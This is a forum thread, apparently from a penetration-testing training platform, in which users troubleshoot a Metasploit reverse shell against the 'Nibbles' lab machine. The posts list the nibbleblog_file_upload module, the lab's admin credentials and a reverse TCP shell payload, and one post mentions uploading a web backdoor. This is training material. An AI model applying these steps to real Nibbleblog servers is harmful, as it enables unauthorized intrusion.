Getting Started - Nibbles - Privilege Escalation

When i was trying to Achieve the reverse shell using “Alternate User Method - Metasploit” i Encountered some weird error

i tried to even copy the whole steps one by one and it even gave me 90% of the similar output Shown in the Method but i was not able to run any command in the Metasploit session -here are the settings i used-

LHOSTS as my IP
RHOSTS as Target ip
set username admin
set password nibbles
set TARGETURI nibbleblog
set payload generic/shell_reverse_tcp

and The exploit was exploit/multi/http/nibbleblog_file_upload

i was able to achieve the Reverse TCP shell connection but was not able to navigate through the session as none of the commands were responding like i tried to cd /home/nibbler/ or cd ~ or cd /home

i was only able to use the ls command which was showing me the db.xml file i thinck which was located in the directory – http:///nibbleblog/content/private/plugins/my_image/

on the server

does anyone has any leads

For me i did not use the metasploit one, I did it manually by uploading a simple backdoor and running my commands in the web URL to get a shell

Type your comment> @Tobii said:

For me i did not use the metasploit one, I did it manually by uploading a simple backdoor and running my commands in the web URL to get a shell

Yes i did apply that method but i also wanted to check the alternate method Thats why i was asking and you should also give it a try… :blush: and maybe correct me :smiley:

if you’re sure that the LHOST, LPORT and RHOST configuration is all correct, I suggest trying with different payloads : try show payloads, and set payload NUMBER, where NUMBER is the number of the payload shown in the list. Sometimes cycling the payloads is enough to get a working connection.

Ok i was able to Gain access using Metasploit Using my own KALI Virtual Box I guess i was doing it right before but i was bad at navigation i guess or there was something wrong because when i used the same command earlier in PWNBOX to cd /home it was not showing any results but now it was showing the nibbler Dir…